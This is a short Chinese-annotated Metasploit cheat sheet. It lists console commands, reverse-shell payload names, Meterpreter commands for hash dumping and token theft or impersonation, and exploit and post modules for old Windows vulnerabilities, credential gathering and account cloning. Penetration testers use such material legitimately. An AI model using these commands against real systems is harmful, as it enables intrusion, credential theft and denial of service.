(1) Metasploit Command(help:-h)
msfconsole,msfpayload,msfvenom,msfencode,msfupdate,db_connect,db_status,db_rebuild_cache,db_export,db_import,help,clear,exit,quit
search,use,set,setg,show,threads,run,exploit,rexploit,sessions,route
hosts,services,vulns,loot,notes,creds,resource
[...SNIP...]
(2) Msfpayload Lists(help:-h |lists:-l)
Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>
windows/shell_reverse_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/meterpreter/reverse_tcp
linux/x86/shell_reverse_tcp
linux/x86/meterpreter/reverse_tcp
[...SNIP...]
(3) Meterpreter Command(help:-h)
use,load,getuid,getsystem,hashdump,ps,shell,migrate,background,run
execute -H -f D:\\temp\\tmp\\Cookies\\csc.exe -a '/c whoami'
use incognito //加载incognito功能(用来盗窃目标主机的令牌或假冒用户)
list_tokens -u //列出目标主机用户的可用令牌。
list_tokens -g //列出目标主机用户组的可用令牌。
impersonate_token “DOMAIN_NAME\\USERNAME” //假冒目标主机上的可用令牌。
steal_token PID //盗窃给定进程的可用令牌并进行令牌假冒。
drop_token //停止假冒当前令牌。
rev2self //在远程机器上调用了RevertToSelf()
[...SNIP...]
(4) Metasploit Module(show option)
exploit/multi/handler //接收攻击载荷的句柄
exploit/windows/smb/smb_login
exploit/windows/smb/psexec
exploit/windows/smb/ms08_067_netapi //MS08_067
exploit/windows/browser/ms12_004_midi //MS12_004
exploit/windows/local/ms_ndproxy //MS14_002
exploit/windows/local/ms14_058_track_popup_menu //MS14_058
auxiliary/dos/windows/rdp/ms12_020_maxchannelids //MS12_020(RDP蓝屏)
exploit/windows/browser/adobe_flash_pixel_bender_bof
post/multi/gather/lastpass_creds //获取主机浏览器保存的密码
post/windows/manage/enable_support_account //克隆系统用户
auxiliary/admin/mssql/mssql_esclate_dbowner
post/windows/gather/smart_hashdump
参考资料
exploit/windows/mysql/mysql_payload:
http://eromang.zataz.com/2011/03/10/oracle-mysql-udf-for-microsoft-windows-metasploit-payload-execution/
Hack ALL Security Features in Remote Windows 7 PC:
http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc
